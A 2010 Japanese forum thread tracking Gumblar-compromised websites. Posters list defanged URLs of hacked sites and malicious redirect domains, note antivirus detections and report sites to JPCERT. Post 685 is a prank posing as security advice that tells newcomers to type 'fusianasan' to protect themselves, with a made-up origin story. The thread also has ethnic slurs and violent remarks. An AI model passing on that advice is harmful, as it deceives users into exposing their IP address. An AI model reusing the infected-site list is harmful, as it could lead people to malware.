10/06/06 22:08:54
リンクからブラウザ起動しないように専ブラの設定変えとけば?
541:535
10/06/06 22:14:48
変なURLのやつはもちろん省くさ
> 使用していないものはアンインストール推奨です
>
> ■ Windows XPは可能ならば新しいOSに
> ■ Windows Update / Microsoft Updateを更新
> ・XP以下は念のためMicrosoft Updateに変更してアップデートする
> ■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
> URLリンク(get.adobe.com)
> ・インストール後本体をアップデート
> ヘルプ → アップデートの有無をチェック
> ・Acrobat Javascriptをオフにする
> 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
> ■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
> URLリンク(get.adobe.com)
> URLリンク(www.adobe.com)
> ・Flash Playerのバージョン確認
> URLリンク(www.adobe.com)
> URLリンク(www.adobe.com)
> ■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
> URLリンク(www.adobe.com)
> ■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
> URLリンク(www.java.com)
> ・Javaのバージョン確認
> URLリンク(www.java.com)
> ■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
> URLリンク(www.apple.com)
> ■ RealPlayerを更新 (使っていないならアンインストール)
> URLリンク(jp.real.com)
ここだけ重点にして
542:名無しさん@お腹いっぱい。
10/06/06 22:16:14
QuickTimeやRealPlayer無しで思う存分動画見られるプレイヤーがあればなあ
543:名無しさん@お腹いっぱい。
10/06/06 22:17:10
>>540
自分が踏んじゃうからこわーい><
って言ってんじゃねえよ
544:名無しさん@お腹いっぱい。
10/06/06 22:19:42
>>541 お前の理解度なんかどうでもいい
545:名無しさん@お腹いっぱい。
10/06/06 22:34:47
スタートアップの製造元、コマンド、場所項目
タスマネプロセスの説明項目
このあたりに不明とか書いてたら怪しいと思っていいのかな
546:名無しさん@お腹いっぱい。
10/06/06 23:01:02
>>521
たぶん誤検知
いかにもな難読化コードなので誤判定されるのも無理ないけど
547:名無しさん@お腹いっぱい。
10/06/06 23:05:22
>>531,533
ちょっとまさぐってみたら
XXXXXXX●ru/skank/index●php?page=3d-anime-hentai-videos
3Dアニメ変態ビデヲwwwww
※何が落ちてくるかは知らん
548:547
10/06/06 23:21:51
ちょっと追記
アクセスする毎に飛ばされる先が違う
thermalvisit●ru
awmmagazine●ru
visitthermal●ru
他にもあるかもしれん
549:名無しさん@お腹いっぱい。
10/06/07 11:35:56
>>546
Avira「HTML/Crypted.Gen」
Avast「JS:Redirector-CE [Trj] 」
Dr.Web「Trojan.MulDrop.1010」
550:名無しさん@お腹いっぱい。
10/06/07 14:26:36
535はうっかりクリックしたらどうすんだよw
551:コテハン ◆8080adndqg
10/06/07 14:34:05
【陥落サイトのURL悪用厳禁】
www●gal-love●com/
katusika●net/
d-pic●net/repo/ ←トップページ以外は相変わらず絶賛放置中
www●bbfactory●jp/
dental-mos●net/ap/14/4/
cre2cash●f01●jp/ ←<!--カス対応中w-->
www●ad-jeaayf●com/links/
www12●plala●or●jp/atakashi/sk/
elyess●hotel-prony-elysees-paris●com/ao/5/3/index●html
552:名無しさん@お腹いっぱい。
10/06/07 16:08:52
なんかめっちゃ増えてるんですけどorz
553:名無しさん@お腹いっぱい。
10/06/07 17:27:12
【悪用厳禁】
URLリンク(www)<)●haisui●com/
URLリンク(webright)<)●vaxponys●com/
JRCERTに報告しました
>>551
JPCERTに報告しました
554:名無しさん@お腹いっぱい。
10/06/07 17:28:02
http削り忘れた…
555:名無しさん@お腹いっぱい。
10/06/07 17:32:09
報告してくれるだけで十分ありがたい
次からは気をつけてね
556:名無しさん@お腹いっぱい。
10/06/07 17:44:09
Flash Player、Adobe Reader/Acrobatに新たな脆弱性、既に悪用も
URLリンク(internet.watch.impress.co.jp)
557:名無しさん@お腹いっぱい。
10/06/07 17:48:26
マジかよ
動画サイト見るのも命がけの時代か
558:名無しさん@お腹いっぱい。
10/06/07 17:53:24
俺はずっと10.1RCを使ってたから
たまたま運良く被害をまぬがれていただけらしい
559:コテハン ◆8080adndqg
10/06/07 18:09:37
>>553 乙です
過去に陥落履歴があった(ような気がする)vaxponys●comを掘ってみた・・・
【陥落サイトのURL悪用厳禁】
best-shoper●vaxponys●com/
dream-girls●vaxponys●com/
diet-mates●vaxponys●com/
rocken-house●vaxponys●com/
german-house●vaxponys●com/
rice-premium123●vaxponys●com/
wine-house●vaxponys●com/
premium-farmer●vaxponys●com/
dyson-good●vaxponys●com/
kayak-house●vaxponys●com/
event-mate●vaxponys●com/
natural-warm●vaxponys●com/
rooms-sayaka●vaxponys●com/
祝!\(^o^)/全滅
※他にもあるかも・・・
560:コテハン ◆8080adndqg
10/06/07 18:16:18
追記
■セーフ ブラウジング
vaxponys●com の診断ページ
www●google●com/safebrowsing/diagnostic?site=vaxponys●com/&hl=ja
>過去 90 日間に、このサイトの一部で不審な動きが 2 回報告されています。
>不正なソフトウェアは vaxponys●sakura●ne●jp/, supernewstuff●ru/ を含む 2 個のドメインでホストされています。
>vaxponys●sakura●ne●jp/
(;゚д゚)・・・
561:名無しさん@お腹いっぱい。
10/06/07 18:25:13
新型ってないの?
ここで報告されているのは殆どavast!で検出できるし
562:名無しさん@お腹いっぱい。
10/06/07 18:36:58
>>535のアンカーは何で危険なんだ?
専ブラでカーソルを合わせるだけなら問題ないのでは?
563:名無しさん@お腹いっぱい。
10/06/07 18:42:42
>>562
迷い込んだ初心者が信用して上から順に素直に何も疑わずクリックすることが想像される
住人の心配は全くしていない
564:名無しさん@お腹いっぱい。
10/06/07 19:03:57 BE:1365451283-PLT(19650)
>>561
Katesリバースエンジニアリングされて中身暴露されたからじゃない?
565:名無しさん@お腹いっぱい。
10/06/07 19:24:33
www.tu-han4.com/hatumo/
566:名無しさん@お腹いっぱい。
10/06/07 19:50:31
>>559
>>560
「vaxponys●sakura●ne●jp」をさくらに通報しました
>>561
取りこぼした検体を提出して検出率100%を目指すというのはどうか
>>565
>>368の時点でJRCERTに提出したんですけど、まだダメですか
もう一回通報しとこうかなあ…
567:名無しさん@お腹いっぱい。
10/06/07 22:46:06
このスレの存在自体危険だよな
568:名無しさん@お腹いっぱい。
10/06/07 22:51:14
>>567
罠リンクを罠リンクと見抜ける人間でないと(2chを使う事は)難しい
569:名無しさん@お腹いっぱい。
10/06/07 22:52:36
Silverlightってどうなの?
脆弱性報告されてたりする?
セキュリティ的にFlashよりいいのなら
ようつべも使えばいいのにと思うのだが
570:名無しさん@お腹いっぱい。
10/06/07 23:01:33
今はレジストリでしか感染確認出来ない?
571:名無しさん@お腹いっぱい。
10/06/07 23:26:52
>>567
このスレがあるから日本でのパンデミックが抑えられてるとも言える。
細々した陥落サイトを閉鎖・修正・消滅に追い込んでる人達に感謝しろよ。
572:名無しさん@お腹いっぱい。
10/06/07 23:28:45
>>570
最近出てるのは確認のしようがないらしい
駆除法もクリーンインストール(普通のウイルスやマルウェアならそこまで行きつかない最終手段)しかないって有様だしな
マスゴミや政府がザルなせいで被害は広がる一方
573:名無しさん@お腹いっぱい。
10/06/07 23:52:52
>>572
FTP以外のメール等のアカウントも抜かれるなら
迷惑メールがいっぱいくるのかな
574:名無しさん@お腹いっぱい。
10/06/07 23:55:15
確認のしようがないってことはavastでスキャンとかしてウイルスなしでも
感染してるかもしれないってことですか?
575:名無しさん@お腹いっぱい。
10/06/07 23:57:51
>>573
迷惑メールは受信だけでなく送信もありえる
それによってフリーメールアカウントなら停止させられるかもしれない
576:名無しさん@お腹いっぱい。
10/06/07 23:58:48
>>574
感染後にDLする何らかのウイルスを検出する可能性が高い
偽セキュリティソフトなんかがその典型
577:名無しさん@お腹いっぱい。
10/06/08 00:04:02
なんでこれだけ被害出てるのに、firefoxとかセキュリティーの低いブラウザ使い続けるのかわからん
IE8/9+Vista/7で保護モード使うか、ChromeのWindows版使うかすればいいのに
いまだにセキュリティー対策にIEからfirefoxにかえろとか大嘘おしえてGumblarとかに引っかかるユーザーを
量産してるアホはいますぐ腹を切るべし
578:名無しさん@お腹いっぱい。
10/06/08 00:05:56
XPなので保護モードありません><
CPUがPenIIIなのでDEPもありません><
579:名無しさん@お腹いっぱい。
10/06/08 00:09:27
>>573
アカウントと言えばYouTube、ニコ動のやつも何か利用されるのだろうか
著作物とかが勝手に違法アップロードされるとか
580:名無しさん@お腹いっぱい。
10/06/08 00:30:38
それよりもGumblar作ったやつをさっさと捕まえるなり殺害するなりしろよ
ここまでやっておいて死刑ですら生温いわ
581:名無しさん@お腹いっぱい。
10/06/08 00:30:51
firefoxで感染なんかしたことないな
script切ってない本人の問題
IEでないと見れないどこかのキムチ国ブラウザなんかいらないからw
582:名無しさん@お腹いっぱい。
10/06/08 00:31:08
テキストウラウザ最強だな
583:名無しさん@お腹いっぱい。
10/06/08 00:32:22
Windows捨てればええねん
LinuxやMacOSへGO!
584:名無しさん@お腹いっぱい。
10/06/08 00:34:43
どのブラウザなら大丈夫なんてないだろ常識的に考えて
それよりしっかりパッチ当てるなりサードパーティ製品のアップデートしろ
585:名無しさん@お腹いっぱい。
10/06/08 00:43:11
そういえばGumblarにたいしてHIPSは有効なのかね
ゼロディされたらこれが唯一の防御壁だろ
586:名無しさん@お腹いっぱい。
10/06/08 00:50:44
HIPSは有効だろうね
ドライブバイダウンロードやおかしな通信を防げる
ただし、最初に感染した時に何されたかはわからないけど
587:名無しさん@お腹いっぱい。
10/06/08 01:15:20
FirefoxにSnortライクなアドオンのFirekeeperがお手軽か
url_content, headers_content, body_contentやurl_re, headers_re, body_reで
拒否許可やアラートのルール作れるらしいから
588:名無しさん@お腹いっぱい。
10/06/08 01:28:23
最近のトレンドは、「やられても安心」っていう方向だからな
ところがfirefoxは設計が古臭く、やられにくいようにできるけど、やられたらダメっていうあいかわらずの旧タイプだな
IEやChromeは、やられても安心っていう方向に進化した
589:名無しさん@お腹いっぱい。
10/06/08 01:36:17
情報ダダ漏れのブラウザなんかいらない
590:名無しさん@お腹いっぱい。
10/06/08 03:08:26
ところが、実際にはFFが安全だったりするw
使ってれば判る事なんだが、アンチ糞は脳内だから知らないんだよ
591:あんちたった ◆MOTO.0SDfQ
10/06/08 03:13:30
>>588
( ゚Д゚)ハァ?
やられたら安全も糞もねぇ終わり。
どのブラウザも同じでしょ?
どのブラウザでもやられないようにすることが大事。
拾い食いして毒食べても平気な人間が居ないのと一緒。
592:名無しさん@お腹いっぱい。
10/06/08 05:32:40
↓この辺とか未対策だったらどうしようもないよね。
URLリンク(kb2.adobe.com)
593:名無しさん@お腹いっぱい。
10/06/08 05:55:30
OSが窓ならなw
594:593
10/06/08 06:04:10
ごめんスレ違い
595:名無しさん@お腹いっぱい。
10/06/08 06:46:28
まぁFFと書く >>590 みたいなのは火狐厨の中でも
特別に低能な情弱なんだけどね
596:名無しさん@お腹いっぱい。
10/06/08 07:02:10
>>590
FFって馬鹿じゃねーの
597:名無しさん@お腹いっぱい。
10/06/08 07:10:42
保護モード下のIEやWindowsのChromeは、レンダリングは権限の低い別プロセスで行うから、
ブラウザがセキュリティーホールでやられたとしても、さらにOSのセキュリティーホールまで
やられない限り影響をうけない
もちろん、レンダリングと同じプロセスで動くプラグインにセキュリティーホールがあってやられたとしても同様
プロセスがやられたらおしまいな火狐とは違う
598:名無しさん@お腹いっぱい。
10/06/08 07:48:33
まあそういうのにこだわってる奴ほど引っかかるんだけどな…
599:名無しさん@お腹いっぱい。
10/06/08 08:24:14
あほか
普通に使ってればこだわり以前にFxだわ
悔し紛れに恥の上塗りかよ
600:名無しさん@お腹いっぱい。
10/06/08 08:25:19
FF君は引っかかりそうだなw
601:名無しさん@お腹いっぱい。
10/06/08 09:46:17
おまいらブラウザの話になるとすぐ沸騰するのなw
このスレ的には「>>4をやっておけばおk」なんだから
ブラウザがどうのこうのって話は他でやってくれ
602:名無しさん@お腹いっぱい。
10/06/08 09:59:34
取扱注意
berkeleyhouse●co●jp
英会話の前にパソコンインストールしなおしたほうが良いね
603:名無しさん@お腹いっぱい。
10/06/08 10:19:38
[adlib's Blog: 無料で始めるサイト改ざんチェックサービス「サイトミハル(SITEMIHARU)」を開始しました。]2010年2月8日月曜日
■有料版:2万円(税別)/月
URLリンク(blog.adlibjapan.jp)
これ誤判定でしょ?
URLリンク(blog.sitemiharu.com)
URLリンク(blog.sitemiharu.com)
604:名無しさん@お腹いっぱい。
10/06/08 10:49:54
san●ron5●com/gbc
またデジロックかぁ
通報しても落ちないんだろうな
605:名無しさん@お腹いっぱい。
10/06/08 11:32:56
>>601
「~使ってる俺一番優秀、それ以外の奴はゴミ」って優越感に浸りたい奴の荒らし目的だから触る人がいる限りどうしようもないね
ここID出ないし、かといって初心者板にはガンブラー関連のスレないし
テンプレ偽造で踏ませるとか犯罪まがいも起こるしマジPC初心者には地獄
606:名無しさん@お腹いっぱい。
10/06/08 13:04:01
dear16●501●jp/deam13/
simple●703●jp/mens
607:名無しさん@お腹いっぱい。
10/06/08 13:30:04
そういえばこれどうなったの?
IEのあらゆるバージョンにローカル・ファイルへの不正アクセスを許す脆弱性
「設計上の基本特性に関わる問題であるため修正は難しい」との見解を示す
URLリンク(www.computerworld.jp)
608:名無しさん@お腹いっぱい。
10/06/08 13:31:22
「~使ってる俺一番優秀、それ以外の奴はゴミ」ってことは汚物Zでもわいたのか?
あれが居着くとアフォ発言が増えてスレが荒廃する。
609:名無しさん@お腹いっぱい。
10/06/08 13:44:39
>>606
以下にリダイレクトされるけどコードが確認できないね
suspended.503.jp/pc.php
610:名無しさん@お腹いっぱい。
10/06/08 14:44:37
>>602
メル凸したらarenaが動いてくれた様です
まだ一部感染していますが、ウイルスの駆除が始まりました
>>606
aguseで引っ掛けると「Pegel.aa」を検出、Gred及びDr.Webでは問題なし
ソースも問題ないですし、.jsなども存在せず…
リダイレクト先がphpとかそういう理由で検出してるとか?
611:名無しさん@お腹いっぱい。
10/06/08 14:54:51
>>606は運営会社が対処したんだと思う
megalodon.jp/2010-0608-1449-01/www.dan.co.uk/viewsource/index.php?url=URLリンク(webcache.googleusercontent.com)●501●jp/deam13/
612:名無しさん@お腹いっぱい。
10/06/08 16:39:04
取扱注意
www●nsc-com●co●jp
www●nagatan●co●jp
同じサーバ上で同じように改ざんされてるとは…。
コンテンツ管理者が同じなのか?
613:名無しさん@お腹いっぱい。
10/06/08 18:17:20
>>603
指定されたメールアドレスに結果が送信されるます。
日本語が不自由な・・・
614:コテハン ◆8080adndqg
10/06/08 18:26:24
【陥落サイトのURL悪用厳禁】
一件だけ投下・・
www●saiwai-estate●net ←なんか変ww
615:名無しさん@お腹いっぱい。
10/06/08 19:56:05
>>614
ページ中にこれを発見!!
reachsaw●ru:8080/meebo-com/google●com/monster●com●php
悪用禁止!!
616:名無しさん@お腹いっぱい。
10/06/09 00:05:42
>>601
その4の対策やっても、Flashの0-dayとかやられるじゃん
Flashの0-Day対策するには、別の方法使うしかない
617:名無しさん@お腹いっぱい。
10/06/09 01:36:02
>メル凸したらarenaが動いてくれた様です
…と思ったら.jsひとつ修正して動きなしってどういうことなのorz
なんかダメっぽいのでJPCERTとIPAに通報しました
>>607
Secuniaを見る限りでは其処から進展してないっぽいです
Firefoxにも脆弱性が見つかってるみたいですし、どうしたものか
>>611
なるほど、そういうことでしたか
しかしaguseはここのところおかしな事続き
>>612
JPCERTに通報、反応待ち
>>614
メル凸済み、反応待ち
618:名無しさん@お腹いっぱい。
10/06/09 03:59:56
>>607
www.microsoft.com/technet/security/bulletin/ms10-035.mspx
619:名無しさん@お腹いっぱい。
10/06/09 11:32:49
取扱注意
www●enzou●jp
620:名無しさん@お腹いっぱい。
10/06/09 12:08:10
amyou●net/pet/ ←デジロック
www●ad-jeaayf●com/links/ ←デジロック
621:名無しさん@お腹いっぱい。
10/06/09 13:12:28
www●ktm-ktm●com/tomoko/
622:名無しさん@お腹いっぱい。
10/06/09 13:19:38
dida●mbsrv●jp
623:コテハン ◆8080adndqg
10/06/09 14:46:48
【陥落サイトのURL悪用厳禁】
www●ekinavi●sakura●ne●jp/diet/
www●kamituji1●com/
www●bbfactory●jp/ ←絶賛放置中(再掲載)
stromstein●fc2web●com/
624:名無しさん@お腹いっぱい。
10/06/09 14:55:10
取扱注意
yasubei●net
625:コテハン ◆8080adndqg
10/06/09 18:39:34
【陥落サイトのURL悪用厳禁】
seikon●nes3●com
www4●atpages●jp/kessan/
掘れば掘るほど出てくる・・orz
626:名無しさん@お腹いっぱい。
10/06/09 19:54:16
山形蕎麦と炙りの焔蔵様
感染の告知は無しでしょうか・・・
グーグルで検索しているお客様は逃げていきますョ
627:名無しさん@お腹いっぱい。
10/06/09 21:06:13
googleの対応は早くてありがたいな
まぁどんどんプログラムの亜種が出てるから「全部感知!」には至ってないけど……
628:名無しさん@お腹いっぱい。
10/06/09 23:01:17
>>626
なぜ?
629:名無しさん@お腹いっぱい。
10/06/10 01:26:54
>>628
キャッシュに改ざんの刻印がある
webcache●googleusercontent●com/search?q=cache:sWB9ZGzluRsJ:www.enzou●jp/
630:名無しさん@お腹いっぱい。
10/06/10 01:47:39
>>602がGREDの解析対象外になっとるwww
631:名無しさん@お腹いっぱい。
10/06/10 04:22:43
って、あれ?
何を検索しても解析対象外になる…
632:名無しさん@お腹いっぱい。
10/06/10 09:24:12
何が起こってるんだ?
633:名無しさん@お腹いっぱい。
10/06/10 10:44:03
elyess●hotel-prony-elysees-paris●com/ao/5/3/
634:名無しさん@お腹いっぱい。
10/06/10 11:18:44
>>602の英会話スクール
ひっそり修正ですかね
635:コテハン ◆8080adndqg
10/06/10 18:15:47
【陥落サイトのURL悪用厳禁】
※8080じゃないやつ
www●alive-kanmoku●com/ansin●html
www●alive-kanmoku●com/bamen-310●html など・・・
www●acl-music●jp/ ←再掲載(改竄されすぎて絶賛崩壊中)
www●minatomo●jp/cart/CreProduct●php ←放置したまま逃げた?
iiji●biz/hirameki/
demchik●100free●com/3●html
636:名無しさん@お腹いっぱい。
10/06/10 19:12:06
あ、Gred直った
これでやっと凸先のチェックが出来る…さて頑張りますか
>>619-624
JPCERTに報告しました
「www●ekinavi●sakura●ne●jp/diet/」はnotfoundですか?
>>634
駆除が完了するまでに3回ほどメールで突っ込んでます
おかげさまでもう突っ込む気になれません
ところでさっきからPegel.bc仕込んだhtmlメールが何通も届いて…
637:名無しさん@お腹いっぱい。
10/06/10 20:20:09
www●og●sugiyama-u●ac●jp/itogiku/news/list●html
638:名無しさん@お腹いっぱい。
10/06/10 20:32:30
>>571
皆さんの善意は尊いですが
誰も見ない細々した陥落サイトが、このスレに報告され、
悪用され、被害拡大している可能性も否定できません
他のスレに張られた例↓
スレリンク(sec板)
スレリンク(download板:484番)
スレリンク(download板:705番)
スレリンク(livemarket1板:47番)
スレリンク(livemarket1板:81番)
スレリンク(win板:80番)
スレリンク(news4vip板:48番)
前スレにもありましたが、継続的に悪用してる事例↓もありますし、良い知恵はないでしょうか
スレリンク(sec板:926番)
639:名無しさん@お腹いっぱい。
10/06/10 20:39:39
638荒らし
640:名無しさん@お腹いっぱい。
10/06/10 21:27:11
>>637
便所の落書きに貼ってあるURLを疑いもせず、いきなり踏むほうにも問題がある。
641:名無しさん@お腹いっぱい。
10/06/10 21:55:58
>>612
こっそり修正されていますね
642:名無しさん@お腹いっぱい。
10/06/10 21:57:27
長野鍛工株式会社
魚拓
URLリンク(megalodon.jp)
中野スタンピング株式会社
魚拓
URLリンク(megalodon.jp)
643:名無しさん@お腹いっぱい。
10/06/10 22:17:24
>>638
2chに貼ってあるURLは安易に踏んじゃだめだよ
644:名無しさん@お腹いっぱい。
10/06/10 22:28:32
このスレの住人は、奇特なことに当事者や関係機関に通報までしている
当事者はそれを受けて実際に対応していっている
2ちゃんにしては、えらいまともなスレだと思う
>>638みたいなこと感じたこともない
それに>>638が言ってるのは2ちゃん内でのことでしかない
それに関しては>>640と言える
ウイルス貼るなんて特定の人間だから、自分の時間使って荒らし報告してアク禁に追い込めば?
645:名無しさん@お腹いっぱい。
10/06/10 22:35:56
意味不明
646:名無しさん@お腹いっぱい。
10/06/10 23:19:31
お前に意味不明
647:638
10/06/10 23:32:11
ここは"日本一巨大"な便所の落書きですから
勢いのあるスレでは、まとめサイト含めてページビューは万いきますよね
「安易に踏むのがダメ」で片付けるのはどうなんでしょう
サイト改竄がこれだけあるんですから、一般感染者は数百倍あるかも
前からノートントラップやブラクラスレのURLが悪用されてましたが
Gumblarは性質が悪いです
ここやブラクラスレで張られたURLを含む投稿を
自動的に受け付けないようにできればいいと思ったんですが
自分も時々感染サイトに報告してますし
このスレのみなさんを尊重してますので荒らしとか言わないで
648:名無しさん@お腹いっぱい。
10/06/10 23:35:23
>>647
ここはそういうとこじゃないでしょ
他の掲示板ならともかくURL安易に踏んじゃダメってのは2chの基本だよ
649:名無しさん@お腹いっぱい。
10/06/10 23:41:21
▽ 板違いと禁止の投稿
セキュリティ関係以外のソフトの話題は板違い。→ 【 Software板 】へ
Winny関連の話題は板違い。→ 【 Download板 】へ
不正アクセスの方法、パスワード・暗号解析など、攻撃方法の話題は禁止です。
荒らし依頼は全ての板で禁止です。
禁止内容の書き込みを発見したら【 削除依頼 】をお願いします。
650:名無しさん@お腹いっぱい。
10/06/10 23:58:49
>>644
検体拾って提出して、検出率アップにも貢献してるよ
651:638
10/06/11 01:22:54
2ちゃんで『リンク安易に踏んじゃダメ』ってのは全く正しいのですが
ここはネット初めて5日以内に辿り着くような巨大掲示板ですから
それを免罪符にするのはどうかと思いますよ
www.kdash.jpやHONDAが改竄されたように
セキュ意識なくても、大手のホームページ担当できるんですから
一般人が引っかかっても責められないです
このスレに感染URLを報告したら
後々責任を持って悪用されていないか調べて削除依頼するというのは
自分も面倒臭いと思います
●皆さんはこのスレに貼られた感染サイトが悪用されて
Gumblar被害の拡大につながっている可能性は"0"だとお思いですか?
スクリプトとかプログラムで自動的に悪用投稿されないような方法が
あると思ったのですが……
652:名無しさん@お腹いっぱい。
10/06/11 01:24:57
悪用してる連中に、その長ったらしい文章で説教して来い
653:名無しさん@お腹いっぱい。
10/06/11 01:34:25
>一般人が引っかかっても責められないです
仕事でやってようが趣味だろうが責められるべき
654:名無しさん@お腹いっぱい。
10/06/11 01:43:18
>>651
自己責任
655:名無しさん@お腹いっぱい。
10/06/11 02:03:58
あちこちに貼って回ってる馬鹿の自演だろ
656:名無しさん@お腹いっぱい。
10/06/11 02:10:09
>>651
↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓
■使い方&注意
URLリンク(info.2ch.net)
【タグ使用やリンクはできるの?】
>★ ワンポイント
>リンクの中には、ブラウザクラッシャ(ブラクラ)やPCクラッシャ(コンコン)やエログロ画像等、悪意をこめて貼り付けられたURLがあります。
>被害を未然に防止するためには、むやみにURLをクリックせず、以降の会話の流れやリンク先のソースをブラクラチェッカー等で確認してみてください。
しっかり書いてあるから>>640の通り。以上。
657:名無しさん@お腹いっぱい。
10/06/11 02:56:47
>>651
ネット初めて5日ならリカバリも楽じゃね
勉強代としては安い方かと
658:名無しさん@お腹いっぱい。
10/06/11 05:33:41
www●alive-kanmoku●com/ansin●html
www●alive-kanmoku●com/bamen-310●html
www●acl-music●jp
www●minatomo●jp/cart/CreProduct●php
iiji●biz/hirameki/
demchik●100free●com/3●html
以上JPCERTに報告済み、ねむい
「acl-music」は通報先にちょっと変わったところを混ぜてみました
659:名無しさん@お腹いっぱい。
10/06/11 07:27:04
Adobe Flash Player 10.1.53.64
660:名無しさん@お腹いっぱい。
10/06/11 08:17:57
getPlusのオマケつきだよ!
661:名無しさん@お腹いっぱい。
10/06/11 09:21:42
またgetplusか
まぁどうせコンパネで消すけど……
それにしても出現からもうすぐ一年経つのに「クリーンインストール」っていう最終手段しか感染した場合の対処法の無いヤツも珍しい
スレで報告されてるのが全部じゃないだろうし、いつになったら決着付くのかねぇ
662:名無しさん@お腹いっぱい。
10/06/11 09:45:29
IE版のFlashのオフラインインストーラー版がほしいときは、FirefoxでFlashダウンロードページにアクセスして
他のブラウザ用を選んでIEを選択すれば大丈夫
それだとgetplus不用でgoogleちゃんもついてないオフライン版をゲットできる
ただし、オフライン版は、更新がAdobe DLM版よりおそく、DLM版公開後1日~数日後になったりする
663:名無しさん@お腹いっぱい。
10/06/11 09:47:03
Adobe Flash Player 10.1.53.64
URLリンク(fpdownload.adobe.com)
URLリンク(fpdownload.adobe.com)
URLリンク(download.macromedia.com)
直リン
664:名無しさん@お腹いっぱい。
10/06/11 11:12:08
取扱注意
www●maple-k●com
665:名無しさん@お腹いっぱい。
10/06/11 11:34:27
>>663
URLリンク(dreamweavermx2.biz)
Player のバージョンが10.0.45.2なのと更新日:2010年2月12日というのはなんとかならんのかw
666:名無しさん@お腹いっぱい。
10/06/11 12:16:46
>>665
え?
667:名無しさん@お腹いっぱい。
10/06/11 12:48:12
この現状を見ると、デジタル証明書の存在が無意味じゃないか
668:名無しさん@お腹いっぱい。
10/06/11 12:59:52
>>663
. ィ
._ .......、._ _ /:/l!
:~""''.>゙' "~ ,、、''‐'、| _
゙、'、::::::ノ:::::::_,.-=. _~:、 /_.}'':,
``、/:::::::::__....,._ `゙'Y' _.ェ-、....._ /_゙''i゙ノ、ノ またまたご冗談を
,.--l‐''"~..-_'.x-='"゙ー 、`'-、 ,:' ノ゙ノブ
" .!-'",/ `'-‐'') /\ `/ でノ-〈
.-''~ >'゙:: ‐'"゙./ ヽ.,' ~ /
//::::: ', / ,:'゙
669:名無しさん@お腹いっぱい。
10/06/11 13:00:10
( ゚,_ゝ゚)バカジャネーノ
670:名無しさん@お腹いっぱい。
10/06/11 13:13:50
>>668
またまたご冗談をw AA略
671:名無しさん@お腹いっぱい。
10/06/11 13:50:47
www●pasar-party●com
672:名無しさん@お腹いっぱい。
10/06/11 14:42:45
取扱注意
www●movecafe●com
673:名無しさん@お腹いっぱい。
10/06/11 14:57:18
>>664
>>671
メル凸済み、反応待ち
674:名無しさん@お腹いっぱい。
10/06/11 14:57:25
URLリンク(www.adobe.com)
あれ?
675:名無しさん@お腹いっぱい。
10/06/11 15:10:35
>>672
メル凸済み、反応待ち
676:名無しさん@お腹いっぱい。
10/06/11 16:44:06
例によってFlashは少し様子見るか…
677:名無しさん@お腹いっぱい。
10/06/11 16:48:17
OS再起動したらgetPlusだけ消えてる
どうなってんだ
678:名無しさん@お腹いっぱい。
10/06/11 17:04:55
>>672
Gred、Dr.Webともに反応せず
お手隙の方、精査よろしくです
679:名無しさん@お腹いっぱい。
10/06/11 17:47:23
>>672
確認できないけど
680:名無しさん@お腹いっぱい。
10/06/11 18:30:35
URLリンク(uproda.2ch-library.com)
変なエロサイトみて適当にクリックしてたら三分おきに↑の画像が表示されるようになったんだけど解決策ありませんか? 正直うっとおしいです・・・
681:名無しさん@お腹いっぱい。
10/06/11 18:32:41
「変な」とわかっていてなおかつリンク先を踏んだあなたが悪い
・・・じゃなくてスレ違い
682:名無しさん@お腹いっぱい。
10/06/11 18:40:58
こういう相談って
他人事みたいな口ぶりが多いよね
683:コテハン ◆8080adndqg
10/06/11 18:42:51
【陥落サイトのURL悪用厳禁】
www●hd-cre●com/bj-fh ←eval(base64_decode・・ なんだこれ?
※www●hd-cre●com/より下の階層はたぶん全滅
www●saiwai-estate●net ←再掲載(絶賛放置中)
blog●mensura-zoili●com/archives/2
seikon●nes3●com
凸してくれてる人>乙です
684:680
10/06/11 19:13:20
URLリンク(www.ad-theater.com)
ちなみにサイトはココです
685:名無しさん@お腹いっぱい。
10/06/11 19:39:16
>>638
2ちゃんねる初心者ですか?
書き込む前にSG(セキュリティー・ガード)に登録しないと危険ですよ。
SGに登録せずに書き込んだ場合、
あなたのパソコンがGumblarに感染させられる恐れがあります。
初期の頃から2ちゃんねるにいる方達はかなりのスキルとこのBBSのコマンドを知っています
ですから簡単にあなたの個人情報等を抜かれ、Googleストリートビューで自宅まで公開された人も数多くおり
社会的に抹殺されてしまう。それが2ちゃんねるの隠れた素顔でもあります
SGしておけばまず実行される.ru:8080自体が無効になってしまうので
どんな凄腕ハッカーでもでも罠URLを踏ませる事ができなくなります
SGに登録する方法は、名前欄に「 fusianasan 」と入れる。
これでSGの登録は完了します
一度登録すれば、ブラウザを閉じない限り継続されます。
2ちゃんねるはルールさえ守れば危険な場所ではありません。
しかし悪意を持った人間も確かに存在します。気を付けて下さいね。
fusianasanは、正式にはフュージャネイザン、
又はフュジャネイザンと読みます。
元々はアメリカの学生達の間で、チャットの時に
セキュリティを強化する為に開発されたシステムです。
fusianasanを掲示板に組み込むのは結構面倒なのですが、
2ちゃんにカキコしてたらウィルスに感染したとか、
個人情報が漏れた等の抗議がうざったくなったひろゆきが、
仕方なく導入しました。
悪意のある人間にクラックされる前にSGを施す事をお勧めします。
686:名無しさん@お腹いっぱい。
10/06/11 19:45:04
>>683
user1.matsumoto.ne.jp/~goma/js/base64.html
>>685
そのIP暴露方法、まだ有効だったのかw
687:名無しさん@お腹いっぱい。
10/06/11 19:50:04
>>680>>684
いわゆるサイト改竄ではないのでスレチ
鑑定スレに行け
688:コテハン ◆8080adndqg
10/06/11 20:04:48
>>686
出先から電話だけで掘ってたからデコードできんかったorz
689:59.106.108.43
10/06/11 20:24:00
>>685
代行でGumblarリンク張る奴もいるからね
スレリンク(operatex板:366番)
スレリンク(siberia板:410番)
スレリンク(morningcoffee板:744番)
Gumbla拡散に利用されて平気なの?
690:名無しさん@お腹いっぱい。
10/06/11 20:53:51
Flash Player更新したがNOSって名前のフォルダが出来てる・・・
コンパネで消した方がいい?
691:名無しさん@お腹いっぱい。
10/06/11 21:06:11
shabao●com/public_html/
692:名無しさん@お腹いっぱい。
10/06/11 22:32:55
>>684
ここ見たらいいんじゃね
